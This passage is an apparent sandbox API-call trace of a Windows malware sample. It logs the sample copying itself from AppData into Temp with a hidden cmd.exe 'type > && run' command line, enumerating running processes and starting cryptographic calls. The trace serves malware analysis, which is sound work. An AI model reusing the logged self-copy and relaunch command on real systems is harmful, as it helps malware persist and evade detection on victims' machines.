lpNumberOfBytesWritten=0x12fb44, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12fb44*=0x1632, lpOverlapped=0x0) returned 1 [0112.817] CloseHandle (hObject=0xf4) returned 1 [0112.818] GetCurrentThreadId () returned 0xaf0 [0112.818] GetCurrentThreadId () returned 0xaf0 [0112.818] GetCurrentThreadId () returned 0xaf0 [0112.818] GetTickCount () returned 0x2704f [0112.818] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc10 | out: lpPerformanceCount=0x12fc10*=16960736202) returned 1 [0112.818] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="w") returned 1 [0112.818] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="5") returned 1 [0112.818] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="8") returned 1 [0112.818] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="8") returned 1 [0112.818] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="H") returned 1 [0112.818] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="5") returned 1 [0112.818] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="d") returned 1 [0112.818] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="N") returned 1 [0112.818] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x14a8b5c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0112.819] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]", cchLength=0x38 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]") returned 0x38 [0112.819] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0112.819] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\", lpszShortPath=0x14a8b5c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0112.819] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]", cchLength=0x63 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]") returned 0x63 [0112.819] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0112.819] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" [PARAMS]", cchLength=0xb1 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\APPDATA\\LOCAL\\TEMP\\W588H5DN.EXE\" && \"C:\\USERS\\EEBSYM5\\APPDATA\\LOCAL\\TEMP\\W588H5DN.EXE\" [PARAMS]") returned 0xb1 [0112.819] CharUpperBuffW (in: lpsz="[PARAMS]", cchLength=0x8 | out: lpsz="[PARAMS]") returned 0x8 [0112.819] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb2c*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb1c | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"", lpProcessInformation=0x12fb1c*(hProcess=0xf0, hThread=0xf4, dwProcessId=0xd94, dwThreadId=0xd98)) returned 1 [0112.825] CloseHandle (hObject=0xf0) returned 1 [0112.825] CloseHandle (hObject=0xf4) returned 1 [0112.825] Sleep (dwMilliseconds=0xfa) [0113.156] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xf8 [0113.162] Process32FirstW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0113.162] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0113.163] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0113.164] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0113.165] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0113.166] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0113.167] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0113.167] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0113.168] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0113.169] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0113.170] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.171] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.172] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.173] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.174] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.175] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0113.175] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.177] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.178] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0113.180] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.181] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0113.183] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0113.184] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0113.186] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0113.359] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.360] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0113.361] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0113.362] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0113.364] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0113.365] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0113.366] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0113.367] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0113.368] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0113.369] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0113.371] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0113.372] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0113.373] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0113.375] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0113.376] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0113.377] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0113.378] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0113.379] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0113.380] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0113.381] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0113.383] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0113.384] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0113.385] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.386] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0113.387] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0113.388] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0113.389] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0113.391] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0113.392] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0113.393] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0113.395] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd5c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bkM66bYk.exe")) returned 1 [0113.396] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0113.397] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0113.399] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0113.400] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0113.401] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xd44, pcPriClassBase=8, dwFlags=0x0, szExeFile="GYm4NxCU.exe")) returned 1 [0113.403] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xd80, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0113.404] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xd68, pcPriClassBase=8, dwFlags=0x0, szExeFile="hvGO9ckx.exe")) returned 1 [0113.405] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xd68, pcPriClassBase=8, dwFlags=0x0, szExeFile="hvGO9ckx.exe")) returned 0 [0113.406] CloseHandle (hObject=0xf8) returned 1 [0113.406] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0xf8 [0113.406] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0113.406] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0113.406] CryptAcquireContextW (in: phProv=0x12ec4c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x12ec4c*=0x1c95c8) returned 1 [0114.969] CryptGenRandom (in: hProv=0x1c95c8, 